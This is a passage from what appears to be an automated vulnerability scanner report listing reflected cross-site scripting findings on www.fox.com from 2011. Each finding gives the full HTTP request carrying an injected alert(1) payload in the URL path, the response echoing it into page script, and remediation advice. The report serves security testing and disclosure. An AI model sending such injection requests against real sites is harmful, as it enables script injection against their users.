This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_playere7276"-alert(1)-"48fb49619f8/swf/akamaiHD.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.113
Content-Type: text/html; charset=utf-8
Content-Length: 21824
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:14:40 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_playere7276"-alert(1)-"48fb49619f8akamaihd"
s_analytics.hier1="fox:shows:_ui:fox_playere7276"-alert(1)-"48fb49619f8akamaihd" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_playere7276"-alert(1)-"48fb496
...[SNIP]...

1.161. http://www.fox.com/_ui/fox_player/swf/akamaiHD.swf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/akamaiHD.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c64f"-alert(1)-"ea254c087f9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player/swf6c64f"-alert(1)-"ea254c087f9/akamaiHD.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.106
Content-Type: text/html; charset=utf-8
Content-Length: 21712
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:14:44 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswf6c64f"-alert(1)-"ea254c087f9"
s_analytics.prop15="sub section:akamaihd" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analytics.getQ
...[SNIP]...

1.162. http://www.fox.com/_ui/fox_player/swf/authentication.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/authentication.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3982f"-alert(1)-"621e918d4e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui3982f"-alert(1)-"621e918d4e4/fox_player/swf/authentication.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.111
Content-Type: text/html; charset=utf-8
Content-Length: 21876
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:14:31 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui3982f"-alert(1)-"621e918d4e4:fox_playerauthentication"
s_analytics.hier1="fox:shows:_ui3982f"-alert(1)-"621e918d4e4:fox_playerauthentication" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui3982f"-alert
...[SNIP]...

1.163. http://www.fox.com/_ui/fox_player/swf/authentication.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/authentication.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9977"-alert(1)-"e2c0455eee8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_playerb9977"-alert(1)-"e2c0455eee8/swf/authentication.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.112
Content-Type: text/html; charset=utf-8
Content-Length: 21848
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:14:36 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_playerb9977"-alert(1)-"e2c0455eee8authentication"
s_analytics.hier1="fox:shows:_ui:fox_playerb9977"-alert(1)-"e2c0455eee8authentication" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_playerb9977"-alert
...[SNIP]...

1.164. http://www.fox.com/_ui/fox_player/swf/authentication.swf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/authentication.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac0ad"-alert(1)-"78b834686 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player/swfac0ad"-alert(1)-"78b834686/authentication.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.105
Content-Type: text/html; charset=utf-8
Content-Length: 21734
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:14:40 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswfac0ad"-alert(1)-"78b834686"
s_analytics.prop15="sub section:authentication" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analytic
...[SNIP]...

1.165. http://www.fox.com/_ui/fox_player/swf/foxComscoreResolverPlugIn.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/foxComscoreResolverPlugIn.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79185"-alert(1)-"40638905b61 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui79185"-alert(1)-"40638905b61/fox_player/swf/foxComscoreResolverPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.120
Content-Type: text/html; charset=utf-8
Content-Length: 21920
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:10:44 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui79185"-alert(1)-"40638905b61:fox_playerfoxcomscoreresolverplugin"
s_analytics.hier1="fox:shows:_ui79185"-alert(1)-"40638905b61:fox_playerfoxcomscoreresolverplugin" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox
...[SNIP]...

1.166. http://www.fox.com/_ui/fox_player/swf/foxComscoreResolverPlugIn.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/foxComscoreResolverPlugIn.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14f20"-alert(1)-"50e3151d1ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player14f20"-alert(1)-"50e3151d1ef/swf/foxComscoreResolverPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.117
Content-Type: text/html; charset=utf-8
Content-Length: 21892
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:10:48 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player14f20"-alert(1)-"50e3151d1effoxcomscoreresolverplugin"
s_analytics.hier1="fox:shows:_ui:fox_player14f20"-alert(1)-"50e3151d1effoxcomscoreresolverplugin" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:
...[SNIP]...

1.167. http://www.fox.com/_ui/fox_player/swf/foxComscoreResolverPlugIn.swf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/foxComscoreResolverPlugIn.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7026e"-alert(1)-"46fe9d5d8f6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player/swf7026e"-alert(1)-"46fe9d5d8f6/foxComscoreResolverPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.113
Content-Type: text/html; charset=utf-8
Content-Length: 21780
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:10:51 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswf7026e"-alert(1)-"46fe9d5d8f6"
s_analytics.prop15="sub section:foxcomscoreresolverplugin" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 =
...[SNIP]...

1.168. http://www.fox.com/_ui/fox_player/swf/foxUrlSigningPlugIn.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/foxUrlSigningPlugIn.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aeff3"-alert(1)-"ddf1ec587d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_uiaeff3"-alert(1)-"ddf1ec587d0/fox_player/swf/foxUrlSigningPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.102
Content-Type: text/html; charset=utf-8
Content-Length: 21896
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:18:19 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_uiaeff3"-alert(1)-"ddf1ec587d0:fox_playerfoxurlsigningplugin"
s_analytics.hier1="fox:shows:_uiaeff3"-alert(1)-"ddf1ec587d0:fox_playerfoxurlsigningplugin" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_uiae
...[SNIP]...

1.169. http://www.fox.com/_ui/fox_player/swf/foxUrlSigningPlugIn.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/foxUrlSigningPlugIn.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d142"-alert(1)-"355fb78501b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player9d142"-alert(1)-"355fb78501b/swf/foxUrlSigningPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.116
Content-Type: text/html; charset=utf-8
Content-Length: 21868
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:18:25 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player9d142"-alert(1)-"355fb78501bfoxurlsigningplugin"
s_analytics.hier1="fox:shows:_ui:fox_player9d142"-alert(1)-"355fb78501bfoxurlsigningplugin" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_player9d
...[SNIP]...

1.170. http://www.fox.com/_ui/fox_player/swf/foxUrlSigningPlugIn.swf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/foxUrlSigningPlugIn.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64e97"-alert(1)-"09df118e9c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

